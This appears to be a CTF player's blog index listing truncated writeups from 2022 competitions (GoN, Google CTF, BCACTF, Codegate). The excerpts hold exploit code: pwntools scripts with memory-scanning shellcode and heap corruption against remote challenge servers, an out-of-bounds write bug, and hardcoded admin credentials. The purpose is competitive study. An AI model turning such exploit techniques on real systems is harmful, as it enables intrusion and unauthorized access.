imssm99 (Soomin Shin)

Hacker

cat :flag_kr:
ST4RT

2022 Fall GoN Open Qual CTF Writeup

2022 Fall GoN Open Qual CTF, imssm99 (2nd, 11427 pts)

A. Zero Gravity

Vulnerability

The value is not checked when idx is read as input, so an out-of-bounds (OOB) access occurs. Through a and r, a value can be added to or read from an arbitrary address in float format.

    cnt = 1;
    for ( i = 0; i < cnt; ++i )
    {
      printf("(r)ead / (a)dd >> ");
      scanf("%2s", &s);
      if ( (char)s == 'a' )
      {
        printf(" idx >> ");
        scanf("%d", &idx);
        printf(" value >> ");
        scanf("%f", &value);
        arr[idx] = value + arr[idx];  // idx is never range-checked
      }
      else if ( (char)s == 'r' )
      {
        printf(" idx >> ");
        scanf("%d", &idx);
        printf("%....

September 1, 2022 · imssm99

Google Capture The Flag 2022 Writeup

Team ST4RT, 65th

Appnote.txt

    import struct

    with open("dump.zip", "rb") as f:
        data = f.read()

    u16 = lambda x: struct.unpack("<H", x)[0]

    flag = bytearray()
    eocd = data[0xEEE2:].split(b"PK\x05\x06")
    for d in eocd[1:]:
        offset = u16(d[12:14])
        flag.append(data[offset-1])
    print(flag)

Segfault Labyrinth

    from pwn import *

    context.arch = "amd64"
    #p = process("./challenge")
    p = remote("segfault-labyrinth.2022.ctfcompetition.com", 1337)
    p.recvline()
    p.sendline(b"0"*8)

    code = """
    mov rsp, rdi;
    mov rbp, rdi;
    add rsp, 0x400;
    add rbp, 0x400;
    mov r8, rdi;
    TASK:
    xor rbx, rbx;
    RUN:
    mov rdi, 2;
    mov rsi, [r8 + rbx*8];
    mov rdx, 0x1;
    mov rax, 1;
    syscall;
    cmp rax, 0xfffffffffffffff2;
    jne FOUND;
    inc rbx;
    cmp rbx, 0x10;
    jne RUN;
    FOUND:
    mov rax, [rsi];
    mov r8, rsi;
    cmp al, 0;
    je TASK;
    mov rdx, 0x40;
    mov rdi, 1;
    mov rax, 1;
    syscall;
    """
    payload = b""
    payload += asm(code)
    p....

August 1, 2022 · imssm99

BCACTF 3.0 Writeup

Team ST4RT, 5th

Notetaker WASM

    from pwn import *

    def run(i):
        p = remote("bin.bcactf.com", 49180)
        #p = process(["node", "--experimental-wasi-unstable-preview1", "runner.js"])

        def note_print(idx):
            p.sendlineafter(b"4)\n", b"1")
            p.sendlineafter(b"inclusive)\n", str(idx).encode())

        def note_delete(idx):
            p.sendlineafter(b"4)\n", b"2")
            p.sendlineafter(b"inclusive)\n", str(idx).encode())

        def note_create(idx):
            p.sendlineafter(b"4)\n", b"3")
            p.sendlineafter(b"inclusive)\n", str(idx).encode())

        def note_write(idx, data):
            p.sendlineafter(b"4)\n", b"4")
            p.sendlineafter(b"inclusive)\n", str(idx).encode())
            p.sendlineafter(b"\n", data)

        note_create(1)
        note_create(2)
        note_create(3)
        note_delete(1)

        # 0x442: %15d -> %lld
        note_write(1, p32(0x443-0xc) + p32(0x646c6c))
        note_delete(2)
        note_delete(1)

        calc = lambda fd, bk: ((fd-0x8) << 32) | bk
        note_write(1, str(calc(0xc00 + 0x4*6, 0x400+0xc*i))....

June 10, 2022 · imssm99

Codegate2022 Qual Writeup

University Division, imssm99, 3rd (4249 points)

CAFE

bot.py contains the admin's ID/PW, so logging in as admin shows the flag.

    driver.get('http://3.39.55.38:1929/login')
    driver.find_element_by_id('id').send_keys('admin')
    driver.find_element_by_id('pw').send_keys('$MiLEYEN4')
    driver.find_element_by_id('submit').click()
    time.sleep(2)

superbee

    func (this *AdminController) AuthKey() {
        encrypted_auth_key, _ := AesEncrypt([]byte(auth_key), []byte(auth_crypt_key))
        this.Ctx.WriteString(hex.EncodeToString(encrypted_auth_key))
    }
    ...
    auth_crypt_key, _ = web.AppConfig.String("auth_crypt_key")

auth_crypt_key is not set, so it is an empty string.

    ...
    } else if controllerName == "AdminController" {
        domain := this.Ctx.Input.Domain()
        if domain != "localhost" {
            this.Abort("Not Local")
            return
        }
    }
    ...
    func (this *AdminController) AuthKey() {
        encrypted_auth_key, _ := AesEncrypt([]byte(auth_key), []byte(auth_crypt_key))
        this....

March 28, 2022 · imssm99